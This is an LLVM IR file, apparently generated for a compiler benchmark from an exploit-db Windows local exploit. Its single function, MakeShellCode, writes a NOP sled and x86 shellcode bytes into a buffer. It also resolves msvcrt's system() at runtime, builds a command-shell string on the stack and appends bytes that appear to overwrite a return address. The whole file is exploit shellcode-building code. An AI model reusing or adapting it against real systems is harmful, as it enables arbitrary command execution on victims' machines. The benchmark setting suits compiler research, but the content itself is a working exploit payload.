; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_79.c_MakeShellCode.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_79.c_MakeShellCode.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [11 x i8] c"msvcrt.dll\00", align 1
@.str.1 = private unnamed_addr constant [7 x i8] c"system\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @MakeShellCode(i8* %0) #0 {
  %2 = alloca i8*, align 8
  %3 = alloca i32, align 4
  %4 = alloca i8*, align 8
  %5 = alloca i32, align 4
  store i8* %0, i8** %2, align 8
  store i32 0, i32* %5, align 4
  br label %6

6:                                                ; preds = %9, %1
  %7 = load i32, i32* %5, align 4
  %8 = icmp slt i32 %7, 36
  br i1 %8, label %9, label %16

9:                                                ; preds = %6
  %10 = load i8*, i8** %2, align 8
  %11 = load i32, i32* %5, align 4
  %12 = sext i32 %11 to i64
  %13 = getelementptr inbounds i8, i8* %10, i64 %12
  store i8 -112, i8* %13, align 1
  %14 = load i32, i32* %5, align 4
  %15 = add nsw i32 %14, 1
  store i32 %15, i32* %5, align 4
  br label %6

16:                                               ; preds = %6
  %17 = load i8*, i8** %2, align 8
  %18 = getelementptr inbounds i8, i8* %17, i64 37
  store i8 -117, i8* %18, align 1
  %19 = load i8*, i8** %2, align 8
  %20 = getelementptr inbounds i8, i8* %19, i64 38
  store i8 -27, i8* %20, align 1
  %21 = load i8*, i8** %2, align 8
  %22 = getelementptr inbounds i8, i8* %21, i64 39
  store i8 85, i8* %22, align 1
  %23 = load i8*, i8** %2, align 8
  %24 = getelementptr inbounds i8, i8* %23, i64 40
  store i8 -117, i8* %24, align 1
  %25 = load i8*, i8** %2, align 8
  %26 = getelementptr inbounds i8, i8* %25, i64 41
  store i8 -20, i8* %26, align 1
  %27 = load i8*, i8** %2, align 8
  %28 = getelementptr inbounds i8, i8* %27, i64 42
  store i8 51, i8* %28, align 1
  %29 = load i8*, i8** %2, align 8
  %30 = getelementptr inbounds i8, i8* %29, i64 43
  store i8 -1, i8* %30, align 1
  %31 = load i8*, i8** %2, align 8
  %32 = getelementptr inbounds i8, i8* %31, i64 44
  store i8 -112, i8* %32, align 1
  %33 = load i8*, i8** %2, align 8
  %34 = getelementptr inbounds i8, i8* %33, i64 45
  store i8 87, i8* %34, align 1
  %35 = load i8*, i8** %2, align 8
  %36 = getelementptr inbounds i8, i8* %35, i64 46
  store i8 -125, i8* %36, align 1
  %37 = load i8*, i8** %2, align 8
  %38 = getelementptr inbounds i8, i8* %37, i64 47
  store i8 -20, i8* %38, align 1
  %39 = load i8*, i8** %2, align 8
  %40 = getelementptr inbounds i8, i8* %39, i64 48
  store i8 4, i8* %40, align 1
  %41 = load i8*, i8** %2, align 8
  %42 = getelementptr inbounds i8, i8* %41, i64 49
  store i8 -58, i8* %42, align 1
  %43 = load i8*, i8** %2, align 8
  %44 = getelementptr inbounds i8, i8* %43, i64 50
  store i8 69, i8* %44, align 1
  %45 = load i8*, i8** %2, align 8
  %46 = getelementptr inbounds i8, i8* %45, i64 51
  store i8 -8, i8* %46, align 1
  %47 = load i8*, i8** %2, align 8
  %48 = getelementptr inbounds i8, i8* %47, i64 52
  store i8 99, i8* %48, align 1
  %49 = load i8*, i8** %2, align 8
  %50 = getelementptr inbounds i8, i8* %49, i64 53
  store i8 -58, i8* %50, align 1
  %51 = load i8*, i8** %2, align 8
  %52 = getelementptr inbounds i8, i8* %51, i64 54
  store i8 69, i8* %52, align 1
  %53 = load i8*, i8** %2, align 8
  %54 = getelementptr inbounds i8, i8* %53, i64 55
  store i8 -7, i8* %54, align 1
  %55 = load i8*, i8** %2, align 8
  %56 = getelementptr inbounds i8, i8* %55, i64 56
  store i8 109, i8* %56, align 1
  %57 = load i8*, i8** %2, align 8
  %58 = getelementptr inbounds i8, i8* %57, i64 57
  store i8 -58, i8* %58, align 1
  %59 = load i8*, i8** %2, align 8
  %60 = getelementptr inbounds i8, i8* %59, i64 58
  store i8 69, i8* %60, align 1
  %61 = load i8*, i8** %2, align 8
  %62 = getelementptr inbounds i8, i8* %61, i64 59
  store i8 -6, i8* %62, align 1
  %63 = load i8*, i8** %2, align 8
  %64 = getelementptr inbounds i8, i8* %63, i64 60
  store i8 100, i8* %64, align 1
  %65 = load i8*, i8** %2, align 8
  %66 = getelementptr inbounds i8, i8* %65, i64 61
  store i8 -58, i8* %66, align 1
  %67 = load i8*, i8** %2, align 8
  %68 = getelementptr inbounds i8, i8* %67, i64 62
  store i8 69, i8* %68, align 1
  %69 = load i8*, i8** %2, align 8
  %70 = getelementptr inbounds i8, i8* %69, i64 63
  store i8 -5, i8* %70, align 1
  %71 = load i8*, i8** %2, align 8
  %72 = getelementptr inbounds i8, i8* %71, i64 64
  store i8 46, i8* %72, align 1
  %73 = load i8*, i8** %2, align 8
  %74 = getelementptr inbounds i8, i8* %73, i64 65
  store i8 -58, i8* %74, align 1
  %75 = load i8*, i8** %2, align 8
  %76 = getelementptr inbounds i8, i8* %75, i64 66
  store i8 69, i8* %76, align 1
  %77 = load i8*, i8** %2, align 8
  %78 = getelementptr inbounds i8, i8* %77, i64 67
  store i8 -4, i8* %78, align 1
  %79 = load i8*, i8** %2, align 8
  %80 = getelementptr inbounds i8, i8* %79, i64 68
  store i8 101, i8* %80, align 1
  %81 = load i8*, i8** %2, align 8
  %82 = getelementptr inbounds i8, i8* %81, i64 69
  store i8 -58, i8* %82, align 1
  %83 = load i8*, i8** %2, align 8
  %84 = getelementptr inbounds i8, i8* %83, i64 70
  store i8 69, i8* %84, align 1
  %85 = load i8*, i8** %2, align 8
  %86 = getelementptr inbounds i8, i8* %85, i64 71
  store i8 -3, i8* %86, align 1
  %87 = load i8*, i8** %2, align 8
  %88 = getelementptr inbounds i8, i8* %87, i64 72
  store i8 120, i8* %88, align 1
  %89 = load i8*, i8** %2, align 8
  %90 = getelementptr inbounds i8, i8* %89, i64 73
  store i8 -58, i8* %90, align 1
  %91 = load i8*, i8** %2, align 8
  %92 = getelementptr inbounds i8, i8* %91, i64 74
  store i8 69, i8* %92, align 1
  %93 = load i8*, i8** %2, align 8
  %94 = getelementptr inbounds i8, i8* %93, i64 75
  store i8 -2, i8* %94, align 1
  %95 = load i8*, i8** %2, align 8
  %96 = getelementptr inbounds i8, i8* %95, i64 76
  store i8 101, i8* %96, align 1
  %97 = call i32 @LoadLibrary(i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str, i64 0, i64 0))
  store i32 %97, i32* %3, align 4
  %98 = load i32, i32* %3, align 4
  %99 = call i8* @GetProcAddress(i32 %98, i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.1, i64 0, i64 0))
  store i8* %99, i8** %4, align 8
  %100 = load i8*, i8** %2, align 8
  %101 = getelementptr inbounds i8, i8* %100, i64 77
  store i8 -72, i8* %101, align 1
  %102 = bitcast i8** %4 to i8*
  %103 = getelementptr inbounds i8, i8* %102, i64 0
  %104 = load i8, i8* %103, align 8
  %105 = load i8*, i8** %2, align 8
  %106 = getelementptr inbounds i8, i8* %105, i64 78
  store i8 %104, i8* %106, align 1
  %107 = bitcast i8** %4 to i8*
  %108 = getelementptr inbounds i8, i8* %107, i64 1
  %109 = load i8, i8* %108, align 1
  %110 = load i8*, i8** %2, align 8
  %111 = getelementptr inbounds i8, i8* %110, i64 79
  store i8 %109, i8* %111, align 1
  %112 = bitcast i8** %4 to i8*
  %113 = getelementptr inbounds i8, i8* %112, i64 2
  %114 = load i8, i8* %113, align 2
  %115 = load i8*, i8** %2, align 8
  %116 = getelementptr inbounds i8, i8* %115, i64 80
  store i8 %114, i8* %116, align 1
  %117 = bitcast i8** %4 to i8*
  %118 = getelementptr inbounds i8, i8* %117, i64 3
  %119 = load i8, i8* %118, align 1
  %120 = load i8*, i8** %2, align 8
  %121 = getelementptr inbounds i8, i8* %120, i64 81
  store i8 %119, i8* %121, align 1
  %122 = load i8*, i8** %2, align 8
  %123 = getelementptr inbounds i8, i8* %122, i64 82
  store i8 80, i8* %123, align 1
  %124 = load i8*, i8** %2, align 8
  %125 = getelementptr inbounds i8, i8* %124, i64 83
  store i8 -115, i8* %125, align 1
  %126 = load i8*, i8** %2, align 8
  %127 = getelementptr inbounds i8, i8* %126, i64 84
  store i8 69, i8* %127, align 1
  %128 = load i8*, i8** %2, align 8
  %129 = getelementptr inbounds i8, i8* %128, i64 85
  store i8 -8, i8* %129, align 1
  %130 = load i8*, i8** %2, align 8
  %131 = getelementptr inbounds i8, i8* %130, i64 86
  store i8 80, i8* %131, align 1
  %132 = load i8*, i8** %2, align 8
  %133 = getelementptr inbounds i8, i8* %132, i64 87
  store i8 -1, i8* %133, align 1
  %134 = load i8*, i8** %2, align 8
  %135 = getelementptr inbounds i8, i8* %134, i64 88
  store i8 85, i8* %135, align 1
  %136 = load i8*, i8** %2, align 8
  %137 = getelementptr inbounds i8, i8* %136, i64 89
  store i8 -12, i8* %137, align 1
  store i32 90, i32* %5, align 4
  br label %138

138:                                              ; preds = %141, %16
  %139 = load i32, i32* %5, align 4
  %140 = icmp slt i32 %139, 291
  br i1 %140, label %141, label %148

141:                                              ; preds = %138
  %142 = load i8*, i8** %2, align 8
  %143 = load i32, i32* %5, align 4
  %144 = sext i32 %143 to i64
  %145 = getelementptr inbounds i8, i8* %142, i64 %144
  store i8 -112, i8* %145, align 1
  %146 = load i32, i32* %5, align 4
  %147 = add nsw i32 %146, 1
  store i32 %147, i32* %5, align 4
  br label %138

148:                                              ; preds = %138
  %149 = load i8*, i8** %2, align 8
  %150 = getelementptr inbounds i8, i8* %149, i64 291
  store i8 36, i8* %150, align 1
  %151 = load i8*, i8** %2, align 8
  %152 = getelementptr inbounds i8, i8* %151, i64 292
  store i8 -15, i8* %152, align 1
  %153 = load i8*, i8** %2, align 8
  %154 = getelementptr inbounds i8, i8* %153, i64 293
  store i8 93, i8* %154, align 1
  %155 = load i8*, i8** %2, align 8
  %156 = getelementptr inbounds i8, i8* %155, i64 294
  store i8 1, i8* %156, align 1
  %157 = load i8*, i8** %2, align 8
  %158 = getelementptr inbounds i8, i8* %157, i64 295
  store i8 38, i8* %158, align 1
  %159 = load i8*, i8** %2, align 8
  %160 = getelementptr inbounds i8, i8* %159, i64 296
  store i8 -15, i8* %160, align 1
  %161 = load i8*, i8** %2, align 8
  %162 = getelementptr inbounds i8, i8* %161, i64 297
  store i8 93, i8* %162, align 1
  %163 = load i8*, i8** %2, align 8
  %164 = getelementptr inbounds i8, i8* %163, i64 298
  store i8 1, i8* %164, align 1
  %165 = load i8*, i8** %2, align 8
  %166 = getelementptr inbounds i8, i8* %165, i64 299
  store i8 0, i8* %166, align 1
  %167 = load i8*, i8** %2, align 8
  %168 = getelementptr inbounds i8, i8* %167, i64 300
  store i8 0, i8* %168, align 1
  ret void
}

declare dso_local i32 @LoadLibrary(i8*) #1

declare dso_local i8* @GetProcAddress(i32, i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
